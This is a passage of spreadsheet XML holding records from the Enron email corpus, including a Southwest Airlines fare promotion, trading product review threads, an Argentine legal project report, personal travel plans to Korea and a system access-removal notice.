;I SURE HOPE THAT A LOT MORE READ IT SOON._x000D_
&gt;_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
  _____  _x000D_
_x000D_
Get more from the Web. FREE MSN Explorer download : &lt;http://explorer.msn.com&gt;_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 19:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'special-offers-help@smtp2.southwest.com'})</t>
  </si>
  <si>
    <t>southwest.com Anniversary and Discount Fare Specials</t>
  </si>
  <si>
    <t>Southwest Airlines e-mail update for_x000D_
April 17, 2001_x000D_
_x000D_
****************************************************************_x000D_
This week's Anniversary and General Market Specials_x000D_
_x000D_
1. Anniversary Markets For $30 Each Way_x000D_
2. $39 - $99 Each Way General Market Specials_x000D_
3. southwest.com Hertz Rental Car Offer_x000D_
4. Southwest Airlines Vacations California Sale_x000D_
5. Click 'n Save Subscriber Information_x000D_
_x000D_
*******Anniversary Markets For $30 Each Way**********_x000D_
_x000D_
This week's Anniversary Markets are:_x000D_
_x000D_
Baltimore Washington Int'l, MD to/from_x000D_
  Long Island/Islip, NY_x000D_
_x000D_
Birmingham, AL to/from New Orleans, LA_x000D_
_x000D_
Chicago, IL to/from Detroit, MI_x000D_
_x000D_
Las Vegas, NV to/from Los Angeles, CA_x000D_
_x000D_
Los Angeles, CA to/from Phoenix, AZ_x000D_
_x000D_
Seattle, WA to/from Spokane, WA_x000D_
_x000D_
The following restrictions will apply:_x000D_
_x000D_
*Available only at southwest.com_x000D_
*21-day advance purchase_x000D_
*Fares are nonrefundable_x000D_
*Travel May 8, 2001 through September 10, 2001._x000D_
*Purchase beginning April 17 through_x000D_
 April 19, 2001, midnight Pacific Time_x000D_
_x000D_
Fares do not include a federal excise tax of $2.75_x000D_
that will be imposed on each flight segment of your_x000D_
itinerary. A flight segment is defined as a takeoff and_x000D_
a landing. The fares listed do not include airport-assessed_x000D_
passenger facility charges (PFCs) of up to $18 roundtrip._x000D_
_x000D_
Please visit our Reservations section to reserve the_x000D_
Southwest Airlines 30th Anniversary Specials at_x000D_
http://www.southwest.com/jp/hotfares.shtml?src=30th0417_x000D_
_x000D_
************** $39 - $99 One-Way Fares ***************_x000D_
_x000D_
We've opened up your Freedom to Fly!_x000D_
_x000D_
In order to let everyone in on our great $39-$99_x000D_
Discount Fare Specials, we've moved them to_x000D_
the Discount Fare column, made them available_x000D_
with a 7-day purchase, and extended the purchase_x000D_
through date to May 24, 2001._x000D_
_x000D_
Please check back next Tuesday for our traditional_x000D_
Click 'n Save Internet Specials._x000D_
_x000D_
Travel on any Tuesday, Wednesday, or Saturday for_x000D_
only $39-$99 Each Way._x000D_
Travel on any Monday, Thursday, Friday, or Sunday for_x000D_
only $46-$119 Each Way._x000D_
_x000D_
Fares do not include a federal excise tax of $2.75_x000D_
that will be imposed on each flight segment of your_x000D_
itinerary. A flight segment is defined as a takeoff and_x000D_
a landing. The fares listed do not include airport-assessed_x000D_
passenger facility charges (PFCs) of up to $18 roundtrip._x000D_
_x000D_
The following restrictions will apply:_x000D_
_x000D_
*7-day advance purchase_x000D_
*Fares are nonrefundable and may only be combined_x000D_
 with other nonrefundable fares_x000D_
*Stay over at least one night_x000D_
*Travel April 24, 2001 through September 10, 2001,_x000D_
 except for May 25 and 28, 2001_x000D_
*Purchase beginning April 17 through_x000D_
 May 24, 2001, midnight Pacific Time_x000D_
*Not available from Orange County, CA_x000D_
_x000D_
*Scroll down to the Additional Information section for_x000D_
more details or visit:_x000D_
http://www.southwest.com/jp/hotfares.shtml?src=0417_x000D_
_x000D_
******** This is the Additional Information section********_x000D_
Additional Information You Need to Know About All_x000D_
of Our Sales:_x000D_
_x000D_
*Changes to any portion of the reservation_x000D_
 (flight, dates, cities, and/or names of passengers),_x000D_
 once purchased, will result in the cancellation of_x000D_
 the ENTIRE reservation and rebooking at the lowest_x000D_
 fare available which could result in a fare increase._x000D_
_x000D_
*Southwest specials are nonchangeable_x000D_
 and nonrefundable._x000D_
*Ticketless Travel Online may only be purchased with_x000D_
 a credit card. Customers holding funds from_x000D_
 a previously unused trip on Southwest Airlines or Customers_x000D_
 who have Southwest Airlines vouchers will not be able to use_x000D_
 those forms of payment for Ticketless Travel Online._x000D_
*Unused funds may be applied toward future travel on_x000D_
 Southwest Airlines within one year of the original purchase date._x000D_
_x000D_
*Seats are limited and won't be available on some_x000D_
 flights that operate during very busy travel times_x000D_
 and holiday periods, such as Memorial weekend_x000D_
 and Independence Day._x000D_
_x000D_
*Standby travel requires an upgrade to the_x000D_
 full unrestricted fare._x000D_
_x000D_
**********southwest.com Hertz Rental Car Offer **********_x000D_
Hertz Two Car Class Upgrade_x000D_
Reserve a Hertz car on southwest.com and get a_x000D_
Two Car Class Upgrade.  For example, rent a_x000D_
Compact and get an upgrade to Full Size, or rent_x000D_
a Midsize and get upgraded to a Premium, or_x000D_
rent a Full Size and get an upgrade to Luxury._x000D_
_x000D_
The Terms and Conditions to the Hertz Two Car Class_x000D_
Upgrade are as follows:_x000D_
_x000D_
*Offer is available at southwest.com only_x000D_
*This offer is valid on Compact 4-door through Full Size_x000D_
 4-door cars for Leisure Weekly, Leisure Weekend,_x000D_
 Standard Weekly, and Standard Weekend rentals._x000D_
*Maximum upgrade is from Full Size to Luxury._x000D_
*This offer is redeemable at Corporate and_x000D_
 participating Licensee locations in Southwest Airlines_x000D_
cities in the U.S._x000D_
*Upgrade is subject to higher class car availability upon_x000D_
 arrival._x000D_
*Minimum 24-hour advance reservation is required._x000D_
*Must enter PC# 922176 in Promo Code box on_x000D_
 southwest.com_x000D_
*Blackout periods apply._x000D_
*Minimum rental age for this offer is 25 and Hertz_x000D_
 standard rental qualifications apply._x000D_
*This offer valid for rentals commencing May 8, 2001_x000D_
 through September 10, 2001._x000D_
_x000D_
Hertz rate and rental conditions for renting location apply._x000D_
Car must be returned to original rental location.  This_x000D_
offer is noncombinable, nontransferable, has no cash_x000D_
value and may not be used in conjunction with any other_x000D_
coupon, offer, or promotion._x000D_
_x000D_
Only one Two Car Class Upgrade offer will be honored per_x000D_
rental transaction; taxes, tax reimbursement, airport related_x000D_
fees, and optional items, such as refueling, are extra._x000D_
_x000D_
Offer not valid in:_x000D_
Boise, ID_x000D_
Columbus, OH_x000D_
Corpus Christi, TX_x000D_
Little Rock, AR_x000D_
Spokane, WA_x000D_
_x000D_
For details, please visit us at:_x000D_
http://www.southwest.com/hotfares/hotfares.html?src=hertz161_x000D_
_x000D_
************** Southwest Airlines Vacations ***************_x000D_
California Sunshine now on sale with_x000D_
Southwest Airlines Vacations_x000D_
_x000D_
Explore the Golden State from the San Francisco Bay_x000D_
area to San Diego and Los Angeles._x000D_
Complete vacation packages are available from_x000D_
select cities._x000D_
For more details, log onto_x000D_
http://www.southwest.com/hotfares/swav_calif.html?src=email_x000D_
_x000D_
****************** Subscriber Information *******************_x000D_
Please pass this great news on to your friends!_x000D_
To subscribe to Southwest Airlines_x000D_
Click 'n Save E-mail Updates,_x000D_
visit http://www.southwest.com/email/_x000D_
_x000D_
Remember, if you change your Internet service provider,_x000D_
you will need to unsubscribe and re-subscribe in order_x000D_
to continue receiving Click 'n Save email updates._x000D_
Please visit our subscription page at:_x000D_
http://www.southwest.com/email/_x000D_
****************************************************************_x000D_
This is a post only mailing from Southwest Airlines._x000D_
Please do not attempt to respond to this message._x000D_
_x000D_
Copyright 2001 Southwest Airlines Co. All Rights Reserved._x000D_
_x000D_
_x000D_
---_x000D_
You are currently subscribed to special-offers as: mark.guzman@enron.com_x000D_
You can unsubscribe anytime at http://www.southwest.com/email/</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 16:32:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Spreads and Product long desc.</t>
  </si>
  <si>
    <t xml:space="preserve">Yes.  We tried to take the language from one of the NP or SP peak products._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Crandall, Sean  _x000D_
Sent:	Wednesday, May 23, 2001 2:56 PM_x000D_
To:	Meredith, Kevin_x000D_
Subject:	RE: Spreads and Product long desc._x000D_
_x000D_
Kevin,_x000D_
_x000D_
Is the SP and NP language in the spread language the same language we use when we transact SP15 or NP15 on eol?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Meredith, Kevin  _x000D_
Sent:	Wednesday, May 23, 2001 11:16 AM_x000D_
To:	Crandall, Sean; Badeer, Robert_x000D_
Subject:	FW: Spreads and Product long desc._x000D_
_x000D_
Please review the documents attached below to ensure they are reading correctly with regard to the products you will be offering.  Once you let me know how this looks to you, I will be able to move forward with the creation of the products._x000D_
_x000D_
Kevin_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nettelton, Marcus  _x000D_
Sent:	Wednesday, May 23, 2001 9:55 AM_x000D_
To:	Meredith, Kevin_x000D_
Subject:	Re: Spreads and Product long desc._x000D_
_x000D_
Kevin - Provided the traders are of the same opinion as to how the products should be described, this works. - Marcus_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kevin Meredith/ENRON@enronXgate 05/21/2001 03:07 PM 	   To: Marcus Nettelton/NA/Enron@ENRON  cc:   Subject: Spreads and Product long desc.	_x000D_
_x000D_
_x000D_
Here are the documents we discussed.  For your convenience, I have my changes tracked.  Please let me know if this works._x000D_
_x000D_
Thank you._x000D_
Kevin_x000D_
(713) 853-9555_x000D_
_x000D_
_x000D_
 &lt;&lt; File: Power spread NP-COB.doc &gt;&gt;  &lt;&lt; File: Power spread SP-PV.doc &gt;&gt; _x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Feb 1999 09:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: BA Project Report</t>
  </si>
  <si>
    <t xml:space="preserve">Brent:_x000D_
_x000D_
Thanks very much for this report - these are VERY helpful in keeping me up to _x000D_
date on what's happening in your part of the world._x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
From: Brent Hendry AT ENRON_DEVELOPMENT@CCMAIL on 02/16/99 08:41 AM_x000D_
To: Mark E Haedicke@ECT, Mark - ECT Legal Taylor@ECT, Randy Young AT _x000D_
ENRON_DEVELOPMENT@CCMAIL_x000D_
cc: Dan J Hyvl@ECT, Jeffrey T Hodge@ECT, Jordan Mintz@ECT, Harry M _x000D_
Collins@ECT, Stephen W Van Hooser@ECT, Bob Carter@ECT, Julio Casillas@ECT, _x000D_
Susan Musch AT ENRON_DEVELOPMENT@CCMAIL, "Andrea Calo/ENRON_DEVELOPMENT" AT _x000D_
ENRON_DEVELOPMENT@CCMAIL, Sue Frusco AT ENRON_DEVELOPMENT@CCMAIL _x000D_
Subject: BA Project Report_x000D_
_x000D_
_x000D_
Importance:  High_x000D_
---------------------------------_x000D_
_x000D_
_x000D_
Here is my list of some of the projects/contracts Andrea and I are involved_x000D_
in or working on (recent comments are in bold):_x000D_
TGS Secured Credit Facility--(Issue raised  by Don Black regarding the _x000D_
feasibility of pledging linepack gas.  We need to check with Robert George on _x000D_
this issue.)_x000D_
_x000D_
Imbedded Capital Contracts--(Scott Porter raised the issue of developing a _x000D_
new form of template with Andrea and asked that we discuss the issue with _x000D_
Robert George.)_x000D_
_x000D_
Distribution Contracts--The commercial group would like to have preapproved _x000D_
distribution contract forms available to give to customers so that the _x000D_
customer can submit them to the distribution company when electing a _x000D_
commercial bypass.  Only two distributors have had their form approved by the _x000D_
ENARGAS.  We are looking into what we can offer to our customers in the other _x000D_
distribution territories to speed the process of finalising distribution _x000D_
contracts with the LDCs to avoid long delays._x000D_
_x000D_
ENARGAS Expedientes--ENARGAS has issued an order to Enron to amend three of _x000D_
its gas contracts to modify references to firm transportation and to unbundle _x000D_
the pricing.  The ENARGAS also sent a letter to our customers which we feel _x000D_
overstepped their regulatory role.  The meeting between Roberto Pensoti and _x000D_
Hector Formica was held last Thursday.  Roberto had a follow up phone _x000D_
conversation with Hector on Friday and had a meeting Monday morning with _x000D_
Alicia Federico to get a feel for the amount of resistance we will get. We _x000D_
have been given a 30 day extension to respond to the order in order to have _x000D_
meetings with the ENARGAS and try to come to some resolution on this issue. _x000D_
The first meeting will be scheduled early next week._x000D_
_x000D_
Neuquen Tax Assessment--Andrea has faxed or emailed the pertinent information _x000D_
regarding the stamp tax assessment on the Technical Assistance Agreement _x000D_
between TGS and EPCA to George Frumkin, Anna Sepulveda and Michelle Blaine _x000D_
who will co-ordinate with TGS and Perez Companc on the strategy for _x000D_
responding to the assessment.  Michelle will call TGS outside counsel today _x000D_
in order to hire him to also represent EPCA.  EPCA has filed its response to _x000D_
Neuquen using the arguments prepared by TGS on January 27.  Michelle Blaine _x000D_
has requested information regarding what the next step by Neuquen might _x000D_
possibly be.  We will look into the issue._x000D_
_x000D_
Tax Lobbying--Jordan Mintz and Terry Thorn are proposing a series of meetings _x000D_
with government officials in late February and have asked Carlos Bastos to _x000D_
see if he can also arrange a meeting with Mr. Lenicov at that time.  Issues _x000D_
include determining whether the stamp tax and turnover tax issues can be _x000D_
lobbied at the national level or only at the provincial level.  There is a _x000D_
proposal that was floated that the turnover tax could be included in the VAT _x000D_
tax scheme which might solve the problem with the turnover tax.  The focus of _x000D_
the meetings is to determine how a lobbying strategy can be developed and who _x000D_
should be involved in the actual lobbying process.  Jordan Mintz is handing _x000D_
off the responsibility he had assumed on this issue to Jim Ginty.  Jordan has _x000D_
asked Carlos Bastos to see if he can set up a meeting with Mr. Lenicov on _x000D_
March 11th or 12th since Terry Thorn can be in Buenos Aires on those days._x000D_
_x000D_
Transportation Capacity Release Guidelines--Must review and comment on new _x000D_
ENARGAS proposed guidelines by February 5.  Comments were made on February 5._x000D_
_x000D_
Vandenfil--Vandenfil has filed for a pre-bankruptcy proceeding which has not _x000D_
yet been "opened" by the court due to the January recess.  For the last three _x000D_
months Vandenfil has made their payments only after our sending them_x000D_
termination notices with a two business day cure period.    The most likely_x000D_
scenario during the preliminary bankruptcy period is that our contract will _x000D_
be "continued" by the trustee giving us a priority in payment for ongoing _x000D_
deliveries of gas.  After the preliminary bankruptcy is opened if we have not _x000D_
been served notice that our contract is "continued" within 30 days we would _x000D_
be allowed to terminate the contract.  One of the risks that we face with _x000D_
this customer is that they may argue to the trustee that we cannot terminate _x000D_
the contract claiming we are providing a public service._x000D_
_x000D_
Imasa Bid--Format of Enron's original proposal structure changed.  Enron and _x000D_
Albanesi submitted joint termsheet to Central Puerto in November  where Enron _x000D_
proposed signing two contracts with Central Puerto, one for the supply of all _x000D_
the gas transportation and another for the supply for 60 percent of the gas _x000D_
requirements and Albanesi proposed two contracts, one for supplying 40 _x000D_
percent of the supply of the gas and another for the building of the pipeline _x000D_
spur.  Central Puerto is studying the proposals and has not responded as of _x000D_
January 25, 1999._x000D_
_x000D_
Dow Pipeline Spur Feasibility Study--Enron and Dow are studying the _x000D_
feasibility of building a pipeline between TGS and two affiliates of Dow. _x000D_
Issues include determining whether our CEIASA shareholder and owners _x000D_
agreements preclude Enron from building spurs for end users and whether spurs _x000D_
that serve more than one customer can be built under current regulatory _x000D_
guidelines.  Andrea will be putting together a short report based on her _x000D_
meeting with Nestor Martinez.   A team meeting consisting of legal, _x000D_
regulatory, commercial, credit and structuring met yesterday to discuss the _x000D_
broad parameters of the Dow spur proposal.  The commercial group is preparing _x000D_
a first draft of a build, operate and finance termsheet that they would like _x000D_
to present to the customer on Thursday to be reviewed by Robert George. _x000D_
Credit is still doing its analysis of the two proposed counterparties._x000D_
_x000D_
Contract Review--Preliminary gas contract reviews for Central Puerto and Ave _x000D_
Fenix for Rob Rice and Federico Cerisoli._x000D_
_x000D_
Gas Deals:_x000D_
Chauvco--20 day gas supply contract being drafted_x000D_
Cerro VanGuardia--Amendment to the gas sale agreement being drafted to cover _x000D_
negotiated changes to the take or pay provisions._x000D_
Bagley--Two Offer letters sent to two Bagley entities for review, Enron was _x000D_
not the low bidder.  I have been asked by to look into how other "marketers" _x000D_
are avoiding the turnover tax and thus be more competitive than we are.  The _x000D_
customer is looking at the relative risks between firm distribution and _x000D_
interruptable distribution but is running up against a deadline for actually _x000D_
requesting a contract template for distribution services.  The contract is _x000D_
slated to begin March 23, however, the distributor has 30 days to respond for _x000D_
requests for distribution services._x000D_
Total--Spot master agreement proposed for transactions out of Neuquen.  Short _x000D_
term draft offer for gas out of Chubut being reviewed by Total.  A separate _x000D_
one year supply contract template supplied by Total is being reviewed.  The _x000D_
customers template contains the same type of language that gave us Antitrust _x000D_
trouble in the PCR contract.  Peidra Buena--Gas sale agreement for peaking_x000D_
gas.    Final offer sent and Gas has started flowing.  We are now working on_x000D_
a one year contract.  A termsheet has been sent to the customer. _x000D_
Dow--Negotiating offer letter format for sale of gas to two Dow affiliates. _x000D_
Gas deal is related to but independent of the spur issue.  A mark up of draft _x000D_
has been received the end of last week, Dow indicates that further comments _x000D_
are to be sent soon._x000D_
_x000D_
Power Deals:_x000D_
We need to draft an output marketing form of contract for the purchase of _x000D_
electricity._x000D_
_x000D_
Argentine Signatories:_x000D_
Scott Neal has approved a new structure for signatories in Argentina.  I will _x000D_
work with Hope Duggan firm on the new POA's._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Jul 2001 17:14:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: visit</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
I can check on getting an earlier flight, but I have a feeling that's it.  I have a new computer at work and don't have messenger downloaded yet, but if you think you might be at work for a while, I might try and do it. _x000D_
-Chris _x000D_
  Susan.M.Scott@enron.com wrote:  It all sounds pretty good, but is there any way to get on an earlier flight_x000D_
Sunday? Probably not, I know there are only a few flights out a day, but_x000D_
if I could get into Houston closer to late afternoon on Sunday it would be_x000D_
a better for me. I'd really like to stay that Saturday night...so if worse_x000D_
comes to worse, I'll just deal with the jet lag._x000D_
Susan_x000D_
-----Original Message-----_x000D_
From: Scott Charles @ENRON_x000D_
[mailto:IMCEANOTES-Scott+20Charles+20+3Ccscott+5Fkorea+40yahoo+2Ecom+3E+40ENRON@ENRON.com]_x000D_
Sent: Monday, July 30, 2001 6:16 PM_x000D_
To: Scott, Susan M._x000D_
Subject: Re: visit_x000D_
Susan,_x000D_
If you leave on Tuesday the 14th, you will arrive on the 15th here._x000D_
That part is fine. However, if you leave on the following Sunday,_x000D_
you'll be back into Houston Sunday. Here is the tenative itenerary:_x000D_
Looks like Continental! leaving Tues Aug 14 going from Intercontinental_x000D_
to LAX 0940-1105._x000D_
Korean Air from LA to Korea at 1230. You would arrive on Wed evening_x000D_
(the 15th) at 5:05pm._x000D_
Leaving Sunday would put you on a flight leaving Korea at 5:30 pm on the_x000D_
26th and arriving to LA at_x000D_
1:00 in the afternoon and leaving again on Continental at 3:30 and_x000D_
arriving in Houston at 9:00pm_x000D_
Sunday night._x000D_
Let me know how that sounds._x000D_
-Chris_x000D_
Susan.M.Scott@enron.com wrote: Sorry I didn't call this weekend, but_x000D_
I was swamped Saturday and_x000D_
subsequently exhausted on Sunday. I basically rotated from my bed to the_x000D_
couch to the pool to the couch and back to bed. Pitiful but much needed._x000D_
Anyway, I was just going to tell you to go ahead and buy the ticket for_x000D_
me._x000D_
Departing the 14th and returning the 26th...which I believe puts me into_x000D_
Seoul Wednesday night and departing on a Sunday. You can either call or_x000D_
email if you have any questions for me. And, I'll decide where I! 'd like_x000D_
to_x000D_
go for the long weekend. I may pick two and just let you two decide the_x000D_
final destination._x000D_
Sue_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
and may contain confidential and privileged material for the sole use of_x000D_
the intended recipient (s). Any r! eview, use, distribution or_x000D_
disclosure by others is strictly prohibited. If you are not the intended_x000D_
recipient (or authorized to receive for the recipient), please contact_x000D_
the sender or reply to Enron Corp. at_x000D_
enron.messaging.administration@enron.com and delete all copies of the_x000D_
message. This e-mail (and any attachments hereto) are not intended to be_x000D_
an offer (or an acceptance) and do not create or evidence a binding and_x000D_
enforceable contract between Enron Corp. (or any of its affiliates) and_x000D_
the intended recipient or any other party, and may not be relied on by_x000D_
anyone as th! e basis of a contract by estoppel or otherwise. Thank you._x000D_
**********************************************************************_x000D_
Do You Yahoo!?_x000D_
Make international calls for as low as $.04/minute with Yahoo! Messenger_x000D_
http://phonecard.yahoo.com/ &lt;&lt; File:_x000D_
http://phonecard.yahoo.com/?.refer=mailtagline &gt;&gt;_x000D_
_x000D_
Do You Yahoo!?_x000D_
Make international calls for as low as $.04/minute with Yahoo! Messengerhttp://phonecard.yahoo.com/ </t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 09:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/27/01; HourAhead hour: 17;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/27/01; HourAhead hour: 17;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042717.txt</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 07:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Japanese Electricity Trading Limit Memo</t>
  </si>
  <si>
    <t>Joe,_x000D_
_x000D_
Sally is out of the office, but wanted me to forward the message that she had _x000D_
reviewed the draft that you put together regarding power trading and she _x000D_
doesn't have any comments._x000D_
_x000D_
Patti_x000D_
x-39106</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 18:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'heather.johnson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'jim.schwieger@enron.com', 'ron.slimp@enron.com', 'edward.ondarza@enron.com', 'robert.morgan@enron.com', 'peter.redpath@enron.com', 'ganapathy.ramesh@enron.com', 'kevin.hannon@enron.com', 'brad.coleman@enron.com', 'mark.ruane@enron.com', 'paul.quilkey@enron.com', 'andrew.kelemen@enron.com', 'tony.spruiell@enron.com', 'wayne.mays@enron.com', 'keith.stepp@enron.com', 'rick.buy@enron.com', 'richard.sanders@enron.com', 'scott.neal@enron.com', 'melissa.allen@enron.com', 'richard.lydecker@enron.com', 'jeffrey.sommers@enron.com', 'colleen.sullivan@enron.com', 'rodney.malcolm@enron.com', 'steve.young@enron.com', 'thomas.gros@enron.com', 'drew.lynch@enron.com', 'jeff.messina@enron.com', 'peter.crilly@enron.com', 'anthony.duenner@enron.com', 'stephen.klein@enron.com', 'basil.karampelas@enron.com', 'lou.pai@enron.com', 'brenda.herod@enron.com', 'derek.davies@enron.com', 'jay.webb@enron.com', 'frank.bay@enron.com', 'harold.buchanan@enron.com', 'jim.coffey@enron.com', 'brian.redmond@enron.com', 'robert.hurt@enron.com', 'peggy.hedstrom@enron.com', 'julie.gomez@enron.com', 'paul.racicot@enron.com', 'sally.beck@enron.com', 'william.bradford@enron.com', 'gary.hickerson@enron.com', 'edward.baughman@enron.com', 'jere.overdyke@enron.com', 'allan.grimm@enron.com', 'kent.miller@enron.com', 'doug.gilbert-smith@enron.com', 'brad.richter@enron.com', 'ed.smida@enron.com', 'james.saunders@enron.com', 'steve.nat@enron.com', 'scott.stoness@enron.com', 'bill.gulyassy@enron.com', 'cassandra.schultz@enron.com', 'berney.aucoin@enron.com', 'dave.nommensen@enron.com', 'craig.breslau@enron.com', 'david.oxley@enron.com', 'barry.pearce@enron.com', 'andy.zipper@enron.com', 'mike.grigsby@enron.com', 'brian.ripley@enron.com', 'richard.lewis@enron.com', 'brad.alford@enron.com', 'bruce.garner@enron.com', 'wanda.curry@enron.com', 'john.thompson@enron.com', 'john.nowlan@enron.com', 'tim.davies@enron.com', 'cullen.duke@enron.com', 'george.wasaff@enron.com', 'chris.foster@enron.com', 'robert.hermann@enron.com', 'david.parquet@enron.com', 'mike.harris@enron.com', 'martin.wenzel@enron.com', 'mark.pickering@enron.com', 'jenny.rub@enron.com', 'jim.fallon@enron.com', 'jennifer.fraser@enron.com', 'tim.despain@enron.com', 'wade.stubblefield@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'ray.neppl@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com', 'jake.thomas@enron.com', 'mark.evans@enron.com', 'kevin.mcgowan@enron.com', 'tim.belden@enron.com', 'david.foster@enron.com', 'donald.black@enron.com', 'carl.tricoli@enron.com', 'chris.mahoney@enron.com', 'bob.crane@enron.com', 'fernley.dyson@enron.com', 'larry.derrett@enron.com', 'beth.perlman@enron.com', 'ted.seitz@enron.com', 'dave.samuels@enron.com', 'scott.tholan@enron.com', 'wade.doshier@enron.com', 'scott.gahn@enron.com', 'gregor.baumerich@enron.com', 'john.cummings@enron.com', 'laura.luce@enron.com', 'jonathan.mckay@enron.com', 'jean.mrha@enron.com', 'brent.price@enron.com', 'dave.roberts@enron.com', 'mark.tawney@enron.com', 'stewart.seeligson@enron.com', 'bryan.seyfried@enron.com', 'david.forster@enron.com', 'melissa.becker@enron.com', 'rod.hayslett@enron.com', 'winston.jia@enron.com', 'vince.kaminski@enron.com', 'john.pavetto@enron.com', 'amita.gosalia@enron.com', 'georgeanne.hodges@enron.com', 'ed.mcmichael@enron.com', 'meredith.eggleston@enron.com', 'brian.bierbach@enron.com', 'daniel.reck@enron.com', 'sherron.watkins@enron.com', 'don.schroeder@enron.com', 'billy.lemmons@enron.com', 'ozzie.pagan@enron.com', 'john.dushinske@enron.com', 'joe.gold@enron.com', 'stuart.staley@enron.com', 'sean.holmes@enron.com', 'jayant.krishnaswamy@enron.com', 'jeff.kinneman@enron.com', 'claudia.stetler@enron.com', 'mark.whitt@enron.com', 'jeremy.wong@enron.com', 'laura.scott@enron.com', 'rick.carson@enron.com', 'tod.lindholm@enron.com', 'barbara.paige@enron.com', 'dennis.benevides@enron.com', 'fred.lagrasta@enron.com', 'niamh.clarke@enron.com', 'lou.casari@enron.com', 'zhiyong.wei@enron.com', 'sheila.knudsen@enron.com', 'beth.apollo@enron.com', 'douglas.huth@enron.com', 'stan.horton@enron.com', 'michael.miller@enron.com', 'everett.plante@enron.com', 'andrea.reed@enron.com', 'kevin.kohnstamm@enron.com', 'christopher.calger@enron.com', 'gregg.young@enron.com', 'hunter.shively@enron.com', 'edward.coats@enron.com', 'john.lavorato@enron.com', 'cindy.olson@enron.com', 'eric.gonzales@enron.com', 'john.zufferli@enron.com', 'paul.devries@enron.com', 'dan.bruce@enron.com', 'leslie.reeves@enron.com', 'brian.spector@enron.com', 'jean.ryall@enron.com', 'alex.robinson@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Sitara, Unify, ERMS Access Removed</t>
  </si>
  <si>
    <t>_x000D_
We are updating access to Sitara, Unify, and ERMS.  We intend to delete users who no longer work at Enron._x000D_
_x000D_
Please carefully review the attached spreadsheet.  The 500 names on this list will be removed from Sitara, Unify, or ERMS after Wednesday, April 25.  If there are current Enron employees on this list or if you have any other concerns, please contact Heather Johnson by Wednesday, April 25 to ensure that access is not interrupted._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Thank you,_x000D_
Heather Johnson_x000D_
ENW Commercial Coordination_x000D_
heather.a.johnson@enron.com_x000D_
713-345-3240</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 06:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'b.palmer@enron.com'})</t>
  </si>
  <si>
    <t>Lone Liquidations - Central Region</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 08/31/2000 _x000D_
01:49 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Cathy Sprowls                           08/30/2000 04:08 PM_x000D_
	_x000D_
_x000D_
To: Phillip M Love/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Lone Liquidations - Central Region_x000D_
_x000D_
_x000D_
Phillip,_x000D_
_x000D_
Here is the detail for the open item related to lone liquidations for May for _x000D_
Central region:_x000D_
_x000D_
_x000D_
NGPL Sales_x000D_
N50101.B  581,059.89 *_x000D_
N50101.C  897,332.09_x000D_
N50101.D    10,048.22 *_x000D_
N50101.E    15,518.59_x000D_
_x000D_
Union Gas Sales_x000D_
N38268.L  1,443,518.67_x000D_
_x000D_
NGPL Purchase_x000D_
N50101.X    10,048.22 *_x000D_
N50101.Y      4,082.40_x000D_
N70658.7  581,059.89 *_x000D_
N70687.7  659,978.83_x000D_
_x000D_
*offsetting liquidations-but I left them on the list because they were lone _x000D_
liquidations._x000D_
_x000D_
Thanks for your help,_x000D_
Cathy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>"Take This Job and Shovel It"</t>
  </si>
  <si>
    <t>Read about how PGE is making methane out of manure in this issue of eBiz._x000D_
_x000D_
Also in this issue:_x000D_
Enron's first quarter earnings overview_x000D_
Online energy trading will reach $3.6 trillion by 2005_x000D_
Tom White becomes U.S. Secretary of the Army_x000D_
A U.K. offshore wind farm_x000D_
The PGE sale terminates_x000D_
How a fuel cell works_x000D_
A little bit of poetry_x000D_
_x000D_
It's all in the latest eBiz.  Go to home.enron.com, click Publications, then _x000D_
click eBiz, and "eBiz April 27, 2001."</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 09:12:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'buckley@enron.com'})</t>
  </si>
  <si>
    <t>RE: Trading Track - Interviews: Wednesday May 30th</t>
  </si>
  <si>
    <t xml:space="preserve">Certainly, I am sure we can work with that._x000D_
_x000D_
